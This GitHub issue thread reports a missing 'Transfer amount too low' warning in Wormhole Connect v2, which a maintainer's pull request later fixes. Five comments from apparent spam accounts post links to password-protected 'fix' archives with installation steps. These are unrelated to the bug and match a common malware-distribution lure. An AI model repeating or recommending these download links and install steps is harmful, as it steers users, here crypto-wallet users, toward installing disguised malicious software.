### ISSUE TITLE
[QA] User is not informed that the transfer amount is too low

### ISSUE THREAD

**Issue by tsadovska** [wormhole-foundation/wormhole-connect#2450]
## Describe the current behavior in detail
Checked on https://wormhole-connect-mainnet.netlify.app/ (Connect v2) with macOS Sonoma 14.5 and Google Chrome Version 128.0.6613.85 (Official Build) (arm64).

Steps:
1. Select Ethereum network and ETH token in "From" section
2. Connect MetaMask wallet in "From" section
3. Select BSC network and BNB token in "To" section
4. Connect MetaMask wallet in "To" section
5. Enter Amount, in my case 0.0001
6. Check if "Transfer amount too low" warning is displayed

Actual result: Warning is not displayed. 
Expected result: Warning is displayed.

## Notes/ Attachments

![image](https://github.com/user-attachments/assets/61973045-4eff-45a1-8ddb-34f7e6814118)

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Wesleyleung** [comment]
I believe @emreboga was working on this earlier with handling of unavailable routes and error messages

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Wesleyleung** [comment]
this should be fixed now with https://github.com/wormhole-foundation/wormhole-connect/pull/2608

**Comment by tsadovska** [comment]
Issue is no longer reproducible on [https://wormhole-connect-mainnet.netlify.app/](https://wormhole-connect-mainnet.netlify.app/?config=N4KAdgpgLg7g9gJwNYC4AEAiAsgQwJZiRQYA0ICcArlBAM7oDaAgtXALY5R4DGAwrwBUACgCUqNEmlwBPHGDHUIkmXIU0A6gAllOWfPEQsgoTr1qIAZXUBJAGICAuiAC%2BQA%3D). 

![image](https://github.com/user-attachments/assets/a069d2f9-1b22-4a10-a3d2-f37a16a1e5e2)

Closing the ticket.
